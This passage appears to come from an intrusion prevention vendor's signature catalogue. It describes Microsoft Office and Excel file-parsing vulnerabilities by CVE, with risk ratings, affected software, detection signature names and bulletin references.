File-RTF_Microsoft-Office-CVE-2016-3234-Information-Disclosure

References:

CVE-2016-3234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3234

MS16-070
http://technet.microsoft.com/security/bulletin/MS16-070

Microsoft-Office-CVE-2016-3284-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-780-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability in Microsoft Office.

Situation:

File-TextId_Microsoft-Office-CVE-2016-3284-Memory-Corruption

References:

CVE-2016-3284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3284

MS16-088
http://technet.microsoft.com/security/bulletin/MS16-088

Microsoft-Office-CVE-2016-3317

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Office detected

Situation:

File-RTF_Microsoft-Office-CVE-2016-3317

References:

CVE-2016-3317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3317

MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099

Microsoft-Office-CVE-2016-3318-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists an out-of-bounds write vulnerability in Microsoft Office products. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
File-RTF_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution

References:

CVE-2016-3318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3318

MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099

Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-839-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

File-OLE_Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read

References:

CVE-2016-7264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7264

MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148

Microsoft-Office-CVE-2016-7289-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

High

First detected in:

sgpkg-ips-844-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher; Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Office. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-OLE_Microsoft-Office-CVE-2016-7289-Memory-Corruption

References:

CVE-2016-7289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7289

MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148

Microsoft-Office-CVE-2017-0014

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Office

Situation:

File-Binary_Microsoft-Office-CVE-2017-0014

References:

CVE-2017-0014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0014

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Office-CVE-2019-0560-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There has been reported an information disclosure vulnerability in Microsoft Office. This vulnerability can be exploited by opening a maliciously crafted Office document.

Situation:

File-TextId_Microsoft-Office-CVE-2019-0560-Information-Disclosure

References:

CVE-2019-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0560

Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
File-OLE_Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335

References:

CVE-2010-3335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3335

BID-44659
http://www.securityfocus.com/bid/44659

MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087

Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution

About this vulnerability:

Code execution vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-102-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office; Microsoft Project; Microsoft Visio

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office products. The flaw is due to improper handling of Microsoft Office files containing malformed records. An attacker can exploit this vulnerability by enticing an unsuspecting user to open a malicious Office document. This flaw may allow the attacker to execute arbitrary code in the context of the currently logged-in user.

Situation:

HTTP_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
File-OLE_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution

References:

CVE-2007-0671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0671

BID-22383
http://www.securityfocus.com/bid/22383

OSVDB-31901
http://www.osvdb.org/31901

MS07-015
http://technet.microsoft.com/security/bulletin/MS07-015

Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Office. The vulnerability is due to improper parsing of the Shapes in the Office document. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Office file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the office application used to open the document will terminate, resulting in the loss of any unsaved data from the current session.

Situation:

File-OLE_Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption

References:

CVE-2008-0118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0118

BID-28146
http://www.securityfocus.com/bid/28146

MS08-016
http://technet.microsoft.com/security/bulletin/MS08-016

Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-913-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

Incorrect handling of encapsulated PostScript documents within Office files causes a type confusion vulnerability in Microsoft Office. A successful exploit allows an attacker to run arbitrary code with the privileges of the affected application.

Situation:

File-TextId_Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion

References:

CVE-2017-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0262

Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

There has been reported a stack buffer overflow vulnerability in Microsoft Office. Embedded Equation Editor OLE objects in Office documents are handled incorrectly. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file, which could lead to code execution.

Situation:

File-RTF_Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow

References:

CVE-2018-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0802

Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1017-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

Incorrect handling of equations in OLE files in Microsoft Office.

Situation:

File-RTF_Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow

References:

CVE-2017-11882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Microsoft-Office-Equation-Editor-Memory-Corruption

About this vulnerability:

A Microsoft Office Equation Editor Memory Corruption vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Office Equation Editor wihch allows remote attackers to run arbitrary code in the context of the current user by failing to properly handle OLE objects in memory.

Situation:

File-Text_Microsoft-Office-Equation-Editor-Memory-Corruption

References:

CVE-2017-11882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to the way the vulnerable product parses Excel documents that contain malformed ADO Objects, allowing for memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution

References:

CVE-2010-1253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253

BID-40531
http://www.securityfocus.com/bid/40531

OSVDB-65228
http://www.osvdb.org/65228

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Open XML File Format Converter

Type:

Integer Overflow

Description:

A integer overflow vulnerability exists in Microsoft Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed object. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
File-OLE_Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow

References:

CVE-2009-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0561

BID-35245
http://www.securityfocus.com/bid/35245

OSVDB-54957
http://www.osvdb.org/54957

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Input Validation

Description:

Improper parsing of Excel data with a malformed Note record causes a vulnerability in Microsoft Excel. A successful exploit may cause an information disclosure.

Situation:

File-OLE_Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure

References:

CVE-2019-1110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1110

Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An use-after-free vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.

Situation:

File-Text_Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free

References:

CVE-2023-36041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36041

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office Compatibility Pack; Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel products. The vulnerability is due to improper parsing of crafted OBJ records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In a successful attack scenario, the behavior of the target depends on the intention of the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

File-OLE_Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption

References:

CVE-2008-4264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4264

BID-32621
http://www.securityfocus.com/bid/32621

MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074

Microsoft-Office-Excel-Formula-Record-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to an error while processing ptg tokens within Formula records in Excel files. This vulnerability can be exploited by enticing a user to open a maliciously crafted Excel file. Successful exploitation will result in the execution arbitrary code in the context of the logged in user, unsuccessful exploitation may cause the program to terminate abnormally.

Situation:

File-OLE_Microsoft-Office-Excel-Formula-Record-Code-Execution

References:

CVE-2010-3235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3235

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-1667-5242

Last changed:

sgpkg-ips-1667-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An arbitrary free vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.

Situation:

File-Text_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
File-TextId_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029

References:

CVE-2023-32029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32029

ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun

Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002; Microsoft Office 2004; Microsoft Office XP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed HFPicture record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow

References:

CVE-2010-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1248

BID-40526
http://www.securityfocus.com/bid/40526

OSVDB-65235
http://www.osvdb.org/65235

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office; Microsoft Open XML File Format Converter; Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to an array-indexing error when processing certain records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

File-OLE_Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption

References:

CVE-2009-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558

BID-35242
http://www.securityfocus.com/bid/35242

OSVDB-54954
http://www.osvdb.org/54954

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Excel products. The vulnerability is due to improper parsing of crafted OBJ records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution

References:

CVE-2009-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0557

BID-35241
http://www.securityfocus.com/bid/35241

OSVDB-54953
http://www.osvdb.org/54953

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Malformed-Record-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Compatibility Pack

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to manipulation of pointer values stored in record types Qsir. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Excel-Malformed-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Record-Memory-Corruption

References:

CVE-2009-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1134

BID-35246
http://www.securityfocus.com/bid/35246

OSVDB-54958
http://www.osvdb.org/54958

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow

About this vulnerability:

Microsoft Office Excel Malformed Records Stack Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-225-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed set of records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow

References:

CVE-2009-0559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0559

BID-35243
http://www.securityfocus.com/bid/35243

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-328-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
HTTP_SS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
File-OLE_Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

References:

CVE-2010-2562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2562

MS10-057
http://technet.microsoft.com/security/bulletin/MS10-057

Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

About this vulnerability:

A buffer overflow vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-319-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
HTTP_SS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
File-OLE_Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

References:

CVE-2010-0822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0822

BID-40520
http://www.securityfocus.com/bid/40520

OSVDB-65236
http://www.osvdb.org/65236

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Object-Record-Corruption

About this vulnerability:

Microsoft Office Excel Object Record Corruption vulnerability

Risk:

High

First detected in:

sgpkg-ips-248-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Microsoft-Office-Excel-Object-Record-Corruption
HTTP_SS-Microsoft-Office-Excel-Object-Record-Corruption
File-OLE_Microsoft-Office-Excel-Object-Record-Corruption

References:

CVE-2009-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0557

BID-35241
http://www.securityfocus.com/bid/35241

OSVDB-54953
http://www.osvdb.org/54953

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Excel. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-OLE_Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption

References:

CVE-2010-3231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3231

BID-43647
http://www.securityfocus.com/bid/43647

MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080

Microsoft-Office-Excel-Publisher-Record-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of an Excel file that includes a malformed Publisher record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

File-OLE_Microsoft-Office-Excel-Publisher-Record-Memory-Corruption

References:

CVE-2010-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1250

BID-40528
http://www.securityfocus.com/bid/40528

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Excel

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel 2002. The vulnerability is due to the way the vulnerable product parses RealTimeData records in Excel documents, allowing for memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption

References:

CVE-2010-1247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1247

BID-40525
http://www.securityfocus.com/bid/40525

OSVDB-65237
http://www.osvdb.org/65237

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to a pointer overwrite error when processing certain records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

HTTP_SS-Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
File-OLE_Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution

References:

CVE-2009-0549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0549

BID-35215
http://www.securityfocus.com/bid/35215

OSVDB-54952
http://www.osvdb.org/54952

MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021

Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

About this vulnerability:

Code execution vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-265-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Excel. By persuading a target user to open a malicious Microsoft Excel file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
